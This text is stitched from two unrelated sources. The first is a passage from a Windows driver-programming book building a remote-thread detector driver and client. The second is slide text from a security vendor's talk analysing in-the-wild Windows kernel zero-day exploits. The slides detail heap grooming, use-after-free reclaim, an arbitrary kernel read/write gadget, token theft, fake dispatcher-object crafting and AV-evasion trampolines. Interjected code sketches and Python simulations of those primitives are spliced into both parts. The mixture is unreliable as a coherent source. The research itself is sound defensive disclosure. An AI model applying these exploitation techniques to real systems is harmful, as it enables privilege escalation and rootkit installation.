threads at that moment:
void OnProcessNotify(PEPROCESS Process, HANDLE ProcessId,
    PPS_CREATE_NOTIFY_INFO CreateInfo) {
    UNREFERENCED_PARAMETER(Process);

    if (CreateInfo) {
        if (!AddNewProcess(ProcessId)) {
            KdPrint((DRIVER_PREFIX "New process created, no room to store\n"));
        }
        else {
            KdPrint((DRIVER_PREFIX "New process added: %u\n",
                HandleToULong(ProcessId)));
        }
    }
}
AddNewProcess locates an empty “slot” in the array and puts the process ID in it:
bool AddNewProcess(HANDLE pid) {
    Locker locker(ProcessesLock);
    if (NewProcessesCount == MaxProcesses)
        return false;

    for (int i = 0; i < MaxProcesses; i++)
        if (NewProcesses[i] == 0) {
            NewProcesses[i] = HandleToUlong(pid);
            break;
        }
    NewProcessesCount++;
    return true;
}
Now comes the interesting part: the thread create/exit callback.

Add process names to the data maintained by the driver for each remote thread.

A remote thread is one where the creator (the caller) is different from the process in which the
new thread is created. We also have to remove some false positives:
void OnThreadNotify(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create) {
    if (Create) {
        bool remote = PsGetCurrentProcessId() != ProcessId
            && PsInitialSystemProcess != PsGetCurrentProcess()
            && PsGetProcessId(PsInitialSystemProcess) != ProcessId;
The second and third checks make sure the source process or target process is not the System process. The
reasons for the System process to exist in these cases are interesting to investigate, but are out of scope for
this book - we’ll just remove these false positives. The question is how to identify the System process. All
versions of Windows from XP have the same PID for the System process: 4. We could use that number
because it’s unlikely to change in the future, but there is another way, which is foolproof and also allows
me to introduce something new.
The kernel exports a global variable, PsInitialSystemProcess, which always points to the System
process’ EPROCESS structure. This pointer can be used just like any other opaque process pointer.
If the thread is indeed remote, we must check if it’s the first thread in the process, and if so, discard this
as a remote thread:
        if (remote) {
            //
            // really remote if it's not a new process
            //
            bool found = FindProcess(ProcessId);
FindProcess searches for a process ID in the NewProcesses array:
bool FindProcess(HANDLE pid) {
    auto id = HandleToUlong(pid);
    SharedLocker locker(ProcessesLock);
    for (int i = 0; i < MaxProcesses; i++)
        if (NewProcesses[i] == id)
            return true;
    return false;
}
If the process is found, then it’s the first thread in the process and we should remove the process from the
new processes array so that subsequent remote threads (if any) can be identified as such:
            if (found) {
                //
                // first thread in process, remove process from new processes array
                //
                RemoveProcess(ProcessId);
            }
RemoveProcess searches for the PID and removes it from the array by zeroing it out:
bool RemoveProcess(HANDLE pid) {
    auto id = HandleToUlong(pid);
    Locker locker(ProcessesLock);
    for (int i = 0; i < MaxProcesses; i++)
        if (NewProcesses[i] == id) {
            NewProcesses[i] = 0;
            NewProcessesCount--;
            return true;
        }
    return false;
}
If the process isn’t found, then it’s not new and we have a real remote thread on our hands:
            else {
                //
                // really a remote thread
                //
                auto item = Lookaside.Alloc();
                auto& data = item->Remote;
                KeQuerySystemTimePrecise(&data.Time);
                data.CreatorProcessId = HandleToULong(PsGetCurrentProcessId());
                data.CreatorThreadId = HandleToULong(PsGetCurrentThreadId());
                data.ProcessId = HandleToULong(ProcessId);
                data.ThreadId = HandleToULong(ThreadId);
                KdPrint((DRIVER_PREFIX
                    "Remote thread detected. (PID: %u, TID: %u) -> (PID: %u, TID: %u)\n",
                    data.CreatorProcessId, data.CreatorThreadId,
                    data.ProcessId, data.ThreadId));

                Locker locker(RemoteThreadsLock);
                // TODO: check the list is not too big
                InsertTailList(&RemoteThreadsHead, &item->Link);
            }
Getting the data to a user mode client can be done in the same way as we did for the SysMon driver:
NTSTATUS DetectorRead(PDEVICE_OBJECT, PIRP Irp) {
    auto irpSp = IoGetCurrentIrpStackLocation(Irp);
    auto len = irpSp->Parameters.Read.Length;
    auto status = STATUS_SUCCESS;
    ULONG bytes = 0;
    NT_ASSERT(Irp->MdlAddress);

    auto buffer = (PUCHAR)MmGetSystemAddressForMdlSafe(
        Irp->MdlAddress, NormalPagePriority);
    if (!buffer) {
        status = STATUS_INSUFFICIENT_RESOURCES;
    }
    else {
        Locker locker(RemoteThreadsLock);
        while (true) {
            //
            // if the list is empty, there is nothing else to give
            //
            if (IsListEmpty(&RemoteThreadsHead))
                break;

            //
            // if remaining buffer size is too small, break
            //
            if (len < sizeof(RemoteThread))
                break;

            auto entry = RemoveHeadList(&RemoteThreadsHead);
            auto info = CONTAINING_RECORD(entry, RemoteThreadItem, Link);
            ULONG size = sizeof(RemoteThread);
            memcpy(buffer, &info->Remote, size);
            len -= size;
            buffer += size;
            bytes += size;

            //
            // return data item to the lookaside list
            //
            Lookaside.Free(info);
        }
    }
    return CompleteRequest(Irp, status, bytes);
}
Because there is just one type of “event” and it has a fixed size, the code is simpler than in the SysMon
case.
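One detail worth unpacking: DetectorRead recovers each RemoteThreadItem from its embedded LIST_ENTRY with CONTAINING_RECORD. That macro is nothing more than pointer arithmetic, as this portable sketch shows (the field order here is illustrative, chosen so the offset is nonzero):

```cpp
#include <cstddef>

// Portable equivalent of the kernel's CONTAINING_RECORD macro: subtract the
// field's offset from the field's address to recover the enclosing struct.
#define CONTAINING_RECORD_(addr, type, field) \
    ((type*)((char*)(addr) - offsetof(type, field)))

struct ListEntry {
    ListEntry* Flink;
    ListEntry* Blink;
};

// Illustrative record: the link is embedded in the middle of the struct,
// not pointed to, so recovering the record requires the offset math above.
struct RemoteThreadItem {
    unsigned Magic;
    ListEntry Link;
    unsigned ProcessId;
};
```

Because the list holds addresses of the embedded Link fields, not of the items themselves, the subtraction is what turns a list entry back into a full record.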
The full driver code is in the KDetector project in the solution for this chapter.
The Detector Client
The client code is very similar to the SysMon client, but simpler, because all “events” have the same
structure and are even fixed-sized. Here are the main and DisplayData functions:
void DisplayData(const RemoteThread* data, int count) {
    for (int i = 0; i < count; i++) {
        auto& rt = data[i];
        DisplayTime(rt.Time);
        printf("Remote Thread from PID: %u TID: %u -> PID: %u TID: %u\n",
            rt.CreatorProcessId, rt.CreatorThreadId, rt.ProcessId, rt.ThreadId);
    }
}

int main() {
    HANDLE hDevice = CreateFile(L"\\\\.\\kdetector", GENERIC_READ, 0,
        nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice == INVALID_HANDLE_VALUE)
        return Error("Error opening device");

    RemoteThread rt[20];    // fixed array is good enough
    for (;;) {
        DWORD bytes;
        if (!ReadFile(hDevice, rt, sizeof(rt), &bytes, nullptr))
            return Error("Failed to read data");

        DisplayData(rt, bytes / sizeof(RemoteThread));
        Sleep(1000);
    }
    CloseHandle(hDevice);
    return 0;
}
DisplayTime is the same one from the SysMonClient project.
We can test the driver by installing it and starting it normally, and launching our client (or we can use
DbgView to see the remote thread outputs). The classic example of a remote thread (as mentioned earlier)
is when a debugger wishes to forcefully break into a target process. Here is one way to do that:
1. Run some executable, say Notepad.exe.
2. Launch WinDbg.
3. Use WinDbg to attach to the Notepad process. A remote thread notification should appear.
Here are some examples of output when the detector client is running:
13:08:15.280: Remote Thread from PID: 7392 TID: 4788 -> PID: 8336 TID: 9384
13:08:58.660: Remote Thread from PID: 7392 TID: 13092 -> PID: 8336 TID: 13288
13:10:52.313: Remote Thread from PID: 7392 TID: 13092 -> PID: 8336 TID: 12676
13:11:25.207: Remote Thread from PID: 15268 TID: 7564 -> PID: 1844 TID: 6688
13:11:25.209: Remote Thread from PID: 15268 TID: 15152 -> PID: 1844 TID: 7928
You might find some remote thread entries surprising (run Process Explorer for a while, for example).
The full code of the client is in the Detector project.
Display process names in the client.
Summary
In this chapter we looked at some of the callback mechanisms provided by the kernel: process, thread
and image loads. In the next chapter, we’ll continue with more callback mechanisms - opening handles to
certain object types, and Registry notifications.
Momigari
Overview of the latest Windows OS kernel exploits
found in the wild
Boris Larin
@oct0xor
30-May-19
Anton Ivanov
@antonivanovm
$whoweare
Boris Larin, Senior Malware Analyst (Heuristic Detection and Vulnerability Research Team), Twitter: @oct0xor
Anton Ivanov, Head of Advanced Threats Research and Detection Team, Twitter: @antonivanovm
What this talk is about
Momigari: the Japanese tradition
of searching for the most beautiful
leaves in autumn
Jiaohe city, Jilin province, Northeast China. [Photo/Xinhua]
http://en.safea.gov.cn/2017-10/26/content_33734832_2.htm
What this talk is about
1) We will give a brief introduction to how we find zero-day exploits and the challenges that we face
2) We will cover three Elevation of Privilege (EOP) zero-day exploits that we found exploited in the wild
•
It is becoming more difficult to exploit the Windows OS kernel
•
Samples encountered ITW provide insights on the current state of things and new techniques
•
We will cover in detail the implementation of two exploits for Windows 10 RS4
3) We will reveal exploitation framework used to distribute some of these exploits
What this talk is about
Kaspersky Lab detection technologies
We commonly add this detail to our reports:
These two technologies are behind all the exploits that we found last year
Technology #1 - Exploit Prevention
7
Delivery
Memory
manipulation
Exploitation
Shellcode
execution
Exploitation
prevented
Detection and
blocking
Payload
execution
start
Technology #2 - The sandbox
[Diagram: a file / URL for testing is sent to several test VMs; artifacts are logged and assembled for analysis, producing a verdict and rich data on activity:
- Execution logs
- Memory dumps
- System / registry changes
- Network connections
- Screenshots
- Exploit artifacts]
Detection of exploits
[Diagram: how-to cycle: find, research, develop]
Exploits caught in the wild by Kaspersky Lab
• May 2018 - CVE-2018-8174 (Windows VBScript Engine Remote Code Execution
Vulnerability)
• October 2018 - CVE-2018-8453 (Win32k Elevation of Privilege Vulnerability)
• November 2018 - CVE-2018-8589 (Win32k Elevation of Privilege Vulnerability)
• December 2018 - CVE-2018-8611 (Windows Kernel Elevation of Privilege
Vulnerability)
• March 2019 - CVE-2019-0797 (Win32k Elevation of Privilege Vulnerability)
• April 2019 - CVE-2019-0859 (Win32k Elevation of Privilege Vulnerability)
One year:
What keeps us awake at night
Six exploits found just by one company in one year
One exploit is remote code execution in Microsoft Office
Five exploits are elevations of privilege
While these numbers are huge, they have got to be just the tip of the iceberg
Example of payouts for single exploit acquisition program
https://zerodium.com/program.html:
Why don’t we see many exploits targeting web browsers, other
applications or networks with ‘zero-click’ RCE being caught?
Even if an exploit was detected, in most cases analysis requires more data than can be acquired by the detection
alone
Zero-day finding complications
Our technologies are aimed at detection and prevention of exploitation
But to find out whether or not detected exploit is zero-day requires additional analysis
Some exploits are easy to detect
Sandboxed process starts to perform weird stuff
Some exploits are hard to detect
False Alarms caused by other software
Example: two or more security software installed on same machine
Field for improvement (web browsers)
The exploit's script is required for further analysis
Scanning the whole memory for all scripts is still impractical
Possible solution:
Browser provides interface for security applications to ask for loaded scripts (similar to Antimalware Scan
Interface (AMSI))
Problems:
If implemented in the same process, it can be patched by the exploit
Detection of escalation of privilege
Escalation of privilege exploits are commonly used in late stages of exploitation
Current events provided by operating system often are enough to build detection for them
As they are usually implemented in native code, they can be analyzed easily
Escalation of privilege exploits are probably the most suitable for analysis
Case 1
CVE-2018-8453
The exploitation module was distributed in encrypted form.
The sample that we found targeted only the x64 platform
•
But analysis shows that x86 exploitation is possible
Code is written to support next OS versions:
•
Windows 10 build 17134
•
Windows 10 build 16299
•
Windows 10 build 15063
•
Windows 10 build 14393
•
Windows 10 build 10586
•
Windows 10 build 10240
•
Windows 8.1
•
Windows 8
•
Windows 7
Win32k
Three of four vulnerabilities we are going to talk about today are present in Win32k
Win32k is a kernel mode driver that handles graphics, user input, UI elements…
It present since the oldest days of Windows
At first it was implemented in user land and then the biggest part of it was moved to kernel level
•
To increase performance
Really huge attack surface
•
More than 1000 syscalls
•
User mode callbacks
•
Shared data
More than half of all kernel security bugs in Windows are found in win32k.sys
https://github.com/Microsoft/MSRC-Security-Research/blob/master/presentations/2018_10_DerbyCon/2018_10_DerbyCon_State_of%20_Win32k_Security.pptx
Security improvements
In past few years Microsoft made a number of improvements that really complicated kernel exploitation and
improved overall security:
Prevent abuse of specific kernel structures commonly used to create an R/W primitive
•
Additional checks over tagWND
•
Hardening of GDI Bitmap objects (Type Isolation of SURFACE objects)
•
…
Improvement of kernel ASLR
•
Fixed a number of ways to disclose kernel pointers through shared data
CVE-2018-8453 was the first known exploit targeting Win32k in Windows 10 RS4
The results of this work can really be seen in the exploits that we find: newer OS build = fewer exploits.
CVE-2018-8453
From the code, it feels like the exploit did not initially support Windows 10 build
17134, and that support was added later
There is a chance that the exploit was used prior to the release of this build,
but we do not have any proof
CVE-2018-8453
win32k!tagWND (Windows 7 x86)
Vulnerability is located in syscall
NtUserSetWindowFNID
Microsoft took win32k!tagWND out of the debug
symbols, but the FNID field is located at the same offset in
Windows 10 (17134)
FNID (Function ID) defines a class of window
(it can be ScrollBar, Menu, Desktop, etc.)
High bit also defines if window is being freed
•
FNID_FREED = 0x8000
CVE-2018-8453
In the NtUserSetWindowFNID syscall, tagWND->fnid is
not checked against 0x8000 (FNID_FREED)
This makes it possible to change the FNID of a window that is
being released
CVE-2018-8453
Microsoft patched the vulnerability with a call to the
IsWindowBeingDestroyed() function
CVE-2018-8453
At the time of reporting, MSRC was not sure that exploitation was possible in the latest build of
Windows 10 and asked us to provide the full exploit
The following slides show pieces of the reverse engineered exploit for Windows 10 build 17134
For obvious reasons we are not going to share the full exploit
CVE-2018-8453
Exploitation happens mostly from hooks set on usermode callbacks
Hooked callbacks:
•
fnDWORD
•
fnNCDESTROY
•
fnINLPCREATESTRUCT
To set hooks:
•
Get address of KernelCallbackTable from PEB
•
Replace callback pointers with our own handlers
CVE-2018-8453
The exploit creates a window and uses ShowWindow(); the fnINLPCREATESTRUCT callback will be triggered
SetWindowPos() will force ShowWindow() to call AddShadow() and create a shadow
*The shadow will be needed later for exploitation
CVE-2018-8453
The exploit prepares the memory layout (heap groom), creates a scrollbar, and sends a message to the scrollbar window for initiation
•
It's performed with message WM_LBUTTONDOWN sent to the scrollbar window
•
Leads to execution of win32k!xxxSBTrackInit() in the kernel (a left mouse button click on the scrollbar initiates scrollbar tracking)
CVE-2018-8453
In the exploit there are five (!) different heap groom tactics
What distinguishes zero-day exploits from regular public exploits?
Usually it's the amount of effort put in to achieve the best reliability
CVE-2018-8453
fengshui_17134: Blind heap groom
fengshui_16299:
•
Register 0x400 classes (lpszMenuName =
0x4141…)
•
Create windows
•
Use technique described by Tarjei Mandt to leak
addresses
NtCurrentTeb()->Win32ClientInfo.ulClientDelta
fengshui_15063 is similar to fengshui_16299
fengshui_14393:
•
Create 0x200 bitmaps
•
Create accelerator table
•
Leak address with gSharedInfo
•
Destroy accelerator table
•
Create 0x200 bitmaps
fengshui_simple: CreateBitmap & GdiSharedHandleTable
Windows 10 Mitigation Improvements
CVE-2018-8453
xxxSBTrackInit() will eventually execute xxxSendMessage(, 0x114,…)
0x114 is the WM_HSCROLL message
How are callbacks executed? The kernel translates the message to a usermode callback:
WM_HSCROLL -> fnDWORD callback
CVE-2018-8453
In exploit there is state machine inside the fnDWORD usermode callback hook
•
State machine is required because fnDWORD usermode callback is called very often
•
We have two stages of exploitation inside fnDWORD hook
Stage 1 - Destroy window inside fnDWORD usermode callback during WM_HSCROLL message
The first thing that is going to be released is the shadow (that's why the shadow was required to be initialized)
It will lead to execution of fnNCDESTROY callback
CVE-2018-8453
During fnNCDESTROY usermode callback find freed shadow and trigger vulnerability
FNID of shadow window is no longer FNID_FREED!
Call stack:
31
CVE-2018-8453
Due to changed FNID message WM_CANCELMODE will lead to freeing of USERTAG_SCROLLTRACK!
Stage 2 (inside the fnDWORD hook)
This will eventually result in Double Free
Call stack:
32
CVE-2018-8453
Freeing USERTAG_SCROLLTRACK with WM_CANCELMODE gives opportunity to reclaim just freed memory
Free bitmaps allocated in Fengshui(), and allocate some more
33
CVE-2018-8453
xxxSBTrackInit() will finish execution with freeing USERTAG_SCROLLTRACK
But it will result in freeing GDITAG_POOL_BITMAP_BITS instead
Free USERTAG_SCROLLTRACK
Free GDITAG_POOL_BITMAP_BITS
Double free:
34
CVE-2018-8453
New mitigation: GDI objects isolation (Implemented in Windows 10 RS4)
Good write-up by Francisco Falcon can be found here:
https://blog.quarkslab.com/reverse-engineering-the-win32k-type-isolation-mitigation.html
The new mitigation eliminates a common exploitation technique of using Bitmaps:
• SURFACE objects used for exploitation are no longer allocated alongside their pixel data buffers
Use of Bitmap objects for kernel exploitation was believed to be killed
But as you can see it will not disappear completely
35
CVE-2018-8453
Exploit creates 64 threads
Each thread is then converted to a GUI thread using win32k functionality
THREADINFO is undocumented, but the structure is partially available through win32k!_w32thread
This leads to a THREADINFO being allocated in place of the dangling bitmap
GetBitmapBits / SetBitmapBits is used to overwrite the THREADINFO data
36
CVE-2018-8453
Control over THREADINFO allows using the SetMessageExtraInfo gadget
Peek and poke *(u64*)((*(u64*) THREADINFO+0x1A8)+0x198)
0x1A8 - Message queue
0x198 - Extra Info
37
CVE-2018-8453
Replace message queue pointer with arbitrary address
Read quadword, but overwrite it with zero
Restore message queue pointer
Replace message queue pointer with arbitrary address
Set quadword at address
Restore message queue pointer
Restore original value
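The swap-based read/write procedure above can be sketched against a simulated flat memory. The offsets 0x1A8 (message queue) and 0x198 (ExtraInfo) are from the slides; the addresses and the set_message_extra_info model are illustrative assumptions, not real kernel behavior.

```python
# Simulated flat memory: the 'kernel' is just a dict of qword cells.
MEM = {}

def read_qword(addr):
    return MEM.get(addr, 0)

def write_qword(addr, value):
    MEM[addr] = value

THREADINFO = 0x10000
REAL_QUEUE = 0x20000
write_qword(THREADINFO + 0x1A8, REAL_QUEUE)

def set_message_extra_info(value):
    # models the gadget: swap old ExtraInfo (queue+0x198) with `value`
    queue = read_qword(THREADINFO + 0x1A8)
    old = read_qword(queue + 0x198)
    write_qword(queue + 0x198, value)
    return old

def arbitrary_read(addr):
    # point the 'queue' at (addr - 0x198) so ExtraInfo aliases *addr;
    # the swap clobbers the target with zero, hence the restore step
    write_qword(THREADINFO + 0x1A8, addr - 0x198)
    leaked = set_message_extra_info(0)       # read quadword, overwrite with 0
    set_message_extra_info(leaked)           # restore original value
    write_qword(THREADINFO + 0x1A8, REAL_QUEUE)
    return leaked

def arbitrary_write(addr, value):
    write_qword(THREADINFO + 0x1A8, addr - 0x198)
    set_message_extra_info(value)            # set quadword at address
    write_qword(THREADINFO + 0x1A8, REAL_QUEUE)

SECRET = 0x31337000
write_qword(SECRET, 0xDEADBEEF)
print(hex(arbitrary_read(SECRET)))
```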
38
CVE-2018-8453
THREADINFO also contains pointer to process object
Exploit uses it to steal system token
39
Case 2
CVE-2018-8589
Probably the least interesting exploit presented
today but it led to far greater discoveries
Race condition in win32k
Exploit found in the wild was targeting only
Windows 7 SP1 32-bit
At least two processor cores are required
40
CVE-2018-8589
CVE-2018-8589 is a complex race condition in win32k due to improper locking of messages sent
synchronously between threads
Found sample exploited with the use of MoveWindow() and WM_NCCALCSIZE message
41
CVE-2018-8589
Both threads have the same window procedure
Second thread initiates recursion
Thread 1
Thread 2
42
CVE-2018-8589
Window procedure
Recursion inside WM_NCCALCSIZE window message callback
Move window of opposite thread to increase recursion
Opposite thread
This thread
Trigger race condition on maximum level of recursion during
thread termination
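The essence of this bug class — kernel-side code using a buffer that another thread can still mutate because of improper locking — can be modeled deterministically in user mode. This is a toy model, not win32k; the events force the losing interleaving so the torn copy always happens.

```python
# Deterministic model of an improper-locking race: the 'kernel' copies a
# user-controlled buffer without holding a lock, while a second thread
# swaps the contents mid-copy.
import threading

lparam = list(b"SAFE-DATA")
copy_started = threading.Event()
swap_done = threading.Event()

def kernel_copy():
    out = []
    for i in range(len(lparam)):
        out.append(lparam[i])        # re-reads shared memory each step
        if i == 3:
            copy_started.set()       # simulated preemption point
            swap_done.wait()
    return bytes(out)

def attacker():
    copy_started.wait()
    lparam[4:] = list(b"PWNED")      # modify while the copy is in flight
    swap_done.set()

t = threading.Thread(target=attacker)
t.start()
result = kernel_copy()
t.join()
print(result)                        # torn copy: half old, half attacker data
```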
43
CVE-2018-8589
For exploitation it is enough to fill the buffer with pointers to shellcode. The return address of SfnINOUTNCCALCSIZE
will be overwritten and execution hijacked
Vulnerability will lead to asynchronous copying of the lParam structure controlled by the attacker
44
Framework
CVE-2018-8589 led to bigger discoveries as it was a part of a larger exploitation framework
• AV evasion
• Choosing appropriate exploit reliably
• DKOM manipulation to install rootkit
Framework purposes
45
Framework - AV evasion
The exploit checks for the presence of emet.dll, and if it is not present it uses trampolines to execute all functions
• Searches for patterns in the text sections of system libraries
• Uses gadgets to build a fake stack and execute functions
/* build fake stack */
push ebp
mov  ebp, esp
push offset gadget_ret
push ebp
mov  ebp, esp
push offset gadget_ret
push ebp
mov  ebp, esp
…
/* push args */
…
/* push return address */
push offset trampoline_prolog
/* jump to function */
jmp  eax
46
Framework - Reliability
Exploit may be triggered more than once
For reliable exploitation proper mutual exclusion is required
Otherwise execution of multiple instances of EOP exploit will lead to BSOD
Use of CreateMutex() function may arouse suspicion
47
Framework - Reliability
Existence of memory block means exploit is running
Create Mutex
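The existence-based check can be sketched with atomic exclusive file creation — a portable stand-in for the framework's named memory block (the real sample uses a memory section, and the marker name here is made up).

```python
# Existence-based mutual exclusion without a named mutex: atomically
# create a marker; if creation fails, another instance is running.
import os
import tempfile

MARKER = os.path.join(tempfile.gettempdir(), "exploit_marker_demo")
if os.path.exists(MARKER):
    os.unlink(MARKER)                # start from a clean state

def try_become_single_instance():
    try:
        fd = os.open(MARKER, os.O_CREAT | os.O_EXCL | os.O_WRONLY)
        os.close(fd)
        return True                  # we own the marker: safe to run
    except FileExistsError:
        return False                 # marker exists: already running

first = try_become_single_instance()
second = try_become_single_instance()
os.unlink(MARKER)                    # cleanup when done
print(first, second)
```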
48
Framework - Reliability
Framework may come with multiple exploits (embedded or received from remote resource)
Exploits perform Windows OS version checks to find if exploit supports target
Framework is able to try different exploits until it finds an appropriate one
Each exploit provides interface to execute provided kernel shellcode
Maximum for embedded exploits
We have seen 4 different exploits
49
Framework - Armory
CVE-2018-8589
CVE-2015-2360
CVE-2018-8611
CVE-2019-0797
?
?
?
We have found 4. But the maximum is 10?
50
Case 3
CVE-2018-8611
Race condition in tm.sys driver
The code is written to support the following OS versions:
• Windows 10 build 15063
• Windows 10 build 14393
• Windows 10 build 10586
• Windows 10 build 10240
• Windows 8.1
• Windows 8
• Windows 7
A new build of the exploit added support for:
• Windows 10 build 17133
• Windows 10 build 16299
Allows escaping the sandbox in Chrome and Edge because
syscall filtering mitigations do not apply to ntoskrnl.exe syscalls
51
CVE-2018-8611
tm.sys driver implements Kernel Transaction Manager (KTM)
It is used to handle errors:
• Perform changes as a transaction
• If something goes wrong, roll back the changes to the file system or registry
It can also be used to coordinate changes if you are designing a new data storage system
52
CVE-2018-8611
KTM objects:
• Transaction manager objects
• Resource manager objects
• Transaction objects
• Enlistment objects
Transaction - a collection of data operations
Resource manager - a component that manages data resources that can be updated by transacted operations
Transaction manager - handles communication between transactional clients and resource managers;
it also tracks the state of each transaction (without data)
Enlistment - an association between a resource manager and a transaction
53
CVE-2018-8611
To abuse the vulnerability the exploit first creates a named pipe and opens it for read and write
Then it creates a pair of new transaction manager objects, resource manager objects, transaction objects
Transaction 1
Transaction 2
54
CVE-2018-8611
Transaction 1
Transaction 2
55
CVE-2018-8611
Exploit creates multiple threads and binds them to a single CPU core
Thread 1 calls NtQueryInformationResourceManager in a loop
Thread 2 tries to execute NtRecoverResourceManager once
56
CVE-2018-8611
Exploitation happens inside a third thread
This thread executes NtQueryInformationThread to get the last syscall of the thread calling NtRecoverResourceManager
Successful execution of NtRecoverResourceManager means the race condition has occurred
At this stage, executing WriteFile on the previously created named pipe will lead to memory corruption
57
CVE-2018-8611
CVE-2018-8611 is a race condition in function TmRecoverResourceManagerExt
Check that ResourceManager is online at function start
Check that enlistment is finalized
But it may happen that the ResourceManager is destroyed before all enlistments are processed
…
58
CVE-2018-8611
Microsoft fixed the vulnerability with the following changes:
• The check for enlistment status was removed
• A check that the ResourceManager is still online was added
59
CVE-2018-8611
We have control over enlistment object. How to exploit that?
There are not many different code paths
We are able to AND arbitrary value if it passes a check.
Seems to be hard to exploit.
60
CVE-2018-8611
We have control over enlistment object. How to exploit that?
There are not many different code paths
We can craft our own object (PVOID)(v10 + 64)
61
CVE-2018-8611
62
CVE-2018-8611
Dispatcher objects:
nt!_KEVENT
nt!_KMUTANT
nt!_KSEMAPHORE
nt!_KTHREAD
nt!_KTIMER
…
dt nt!_KTHREAD
   +0x000 Header     : _DISPATCHER_HEADER
…
dt nt!_DISPATCHER_HEADER
   +0x000 Lock       : Int4B
   +0x000 LockNV     : Int4B
   +0x000 Type       : UChar
   +0x001 Signalling : UChar
…
63
CVE-2018-8611
dt nt!_KOBJECTS
EventNotificationObject = 0n0
EventSynchronizationObject = 0n1
MutantObject = 0n2
ProcessObject = 0n3
QueueObject = 0n4
SemaphoreObject = 0n5
ThreadObject = 0n6
GateObject = 0n7
TimerNotificationObject = 0n8
TimerSynchronizationObject = 0n9
Spare2Object = 0n10
Spare3Object = 0n11
Spare4Object = 0n12
Spare5Object = 0n13
Spare6Object = 0n14
Spare7Object = 0n15
Spare8Object = 0n16
ProfileCallbackObject = 0n17
ApcObject = 0n18
DpcObject = 0n19
DeviceQueueObject = 0n20
PriQueueObject = 0n21
InterruptObject = 0n22
ProfileObject = 0n23
Timer2NotificationObject = 0n24
Timer2SynchronizationObject = 0n25
ThreadedDpcObject = 0n26
MaximumKernelObject = 0n27
64
CVE-2018-8611
Provide fake EventNotificationObject
65
CVE-2018-8611
While the current thread is in a wait state we can modify the dispatcher object from user mode
Since we have the address of _KWAIT_BLOCK, we can calculate the address of _KTHREAD
0: kd> dt nt!_KTHREAD
   +0x000 Header            : _DISPATCHER_HEADER
   +0x018 SListFaultAddress : Ptr64 Void
   +0x020 QuantumTarget     : Uint8B
   +0x028 InitialStack      : Ptr64 Void
   +0x030 StackLimit        : Ptr64 Void
   +0x038 StackBase         : Ptr64 Void
   +0x040 ThreadLock        : Uint8B
   ...
   +0x140 WaitBlock         : [4] _KWAIT_BLOCK
   +0x140 WaitBlockFill4    : [20] UChar
   +0x154 ContextSwitches   : Uint4B
   ...
_KTHREAD = _KWAIT_BLOCK - 0x140
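The pointer arithmetic used through the rest of this stage is plain offset math and is easy to sanity-check. The offsets come from the slides; the leaked address below is a made-up example value.

```python
# Offset arithmetic from the slides: recover _KTHREAD from the leaked
# _KWAIT_BLOCK address, then locate the byte that the later
# KiTryUnwaitThread write will zero.
WAITBLOCK_OFFSET_IN_KTHREAD = 0x140   # _KTHREAD.WaitBlock

leaked_kwait_block = 0xFFFF800012345140          # example leaked address
kthread = leaked_kwait_block - WAITBLOCK_OFFSET_IN_KTHREAD

# WaitBlock.Thread is set to KTHREAD + 0x1EB, and the unwait path
# zeroes a byte at Thread + 0x40 -- landing at KTHREAD + 0x22B.
fake_thread_ptr = kthread + 0x1EB
zeroed_byte = fake_thread_ptr + 0x40
print(hex(zeroed_byte - kthread))
```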
66
CVE-2018-8611
Modify dispatcher object, build SemaphoreObject
0: kd> dt nt!_KMUTANT
   +0x000 Header            : _DISPATCHER_HEADER
   +0x018 MutantListEntry   : _LIST_ENTRY
   +0x028 OwnerThread       : Ptr64 _KTHREAD
   +0x030 Abandoned         : UChar
   +0x031 ApcDisable        : UChar

mutex->Header.Type = SemaphoreObject;
mutex->Header.SignalState = 1;
mutex->OwnerThread = Leaked_KTHREAD;
mutex->ApcDisable = 0;
mutex->MutantListEntry = Fake_LIST;
mutex->Header.WaitListHead.Flink =

0: kd> dt nt!_KWAIT_BLOCK
   +0x000 WaitListEntry     : _LIST_ENTRY
   +0x010 WaitType          : UChar
   +0x011 BlockState        : UChar
   +0x012 WaitKey           : Uint2B
   +0x014 SpareLong         : Int4B
   +0x018 Thread            : Ptr64 _KTHREAD
   +0x018 NotificationQueue : Ptr64 _KQUEUE
   +0x020 Object            : Ptr64 Void
   +0x028 SparePtr          : Ptr64 Void
67
CVE-2018-8611
waitBlock.WaitType = 3;
waitBlock.Thread = Leaked_KTHREAD + 0x1EB;

0: kd> dt nt!_KWAIT_BLOCK
   +0x000 WaitListEntry     : _LIST_ENTRY
   +0x010 WaitType          : UChar
   +0x011 BlockState        : UChar
   +0x012 WaitKey           : Uint2B
   +0x014 SpareLong         : Int4B
   +0x018 Thread            : Ptr64 _KTHREAD
   +0x018 NotificationQueue : Ptr64 _KQUEUE
   +0x020 Object            : Ptr64 Void
   +0x028 SparePtr          : Ptr64 Void
Call to GetThreadContext(…) will make
KeWaitForSingleObject continue execution
Add one more thread to WaitList with WaitType = 1
68
CVE-2018-8611
The fake Semaphore object will be passed to KeReleaseMutex, which is a wrapper for KeReleaseMutant
The check for the current thread will be bypassed because we were able to leak it
69
CVE-2018-8611
Since WaitType of crafted WaitBlock is equal to three, this WaitBlock will be passed to KiTryUnwaitThread
70
CVE-2018-8611
KiTryUnwaitThread is a big function but the most interesting is located at function end
This was set to Leaked_KTHREAD + 0x1EB
We are able to set Leaked_KTHREAD + 0x1EB + 0x40 to 0!
71
CVE-2018-8611
KTHREAD + 0x22B
0: kd> dt nt!_KTHREAD
   ...
   +0x228 UserAffinity      : _GROUP_AFFINITY
   +0x228 UserAffinityFill  : [10] UChar
   +0x232 PreviousMode      : Char
   +0x233 BasePriority      : Char
   +0x234 PriorityDecrement : Char
72
CVE-2018-8611
One byte to rule them all
73
CVE-2018-8611
With the ability to use NtReadVirtualMemory, further elevation of privilege and installation of a rootkit is trivial
Possible mitigation improvements:
• Hardening of Kernel Dispatcher Objects
• Validation with a secret for PreviousMode
Abuse of dispatcher objects seems to be a valuable exploitation technique
• Huge thanks to Microsoft for handling our findings very fast.
• Zero-days seem to have a long lifespan. Good vulnerabilities survive mitigations.
• Attackers know that if an exploit is found, it will be found by a security vendor. There is a shift toward
implementing better AV evasion.
• Two exploits that we found were for the latest builds of Windows 10, but most zero-days that are found are
for older versions. It means that the effort put into mitigations is working.
• Race condition vulnerabilities are on the rise. Three of the five vulnerabilities that we found are race
conditions. Very good fuzzers (a reimagining of Bochspwn?) or static analysis? We are going to see more
vulnerabilities like this.
• Win32k lockdown and syscall filtering are effective, but attackers are switching to exploiting bugs in ntoskrnl.
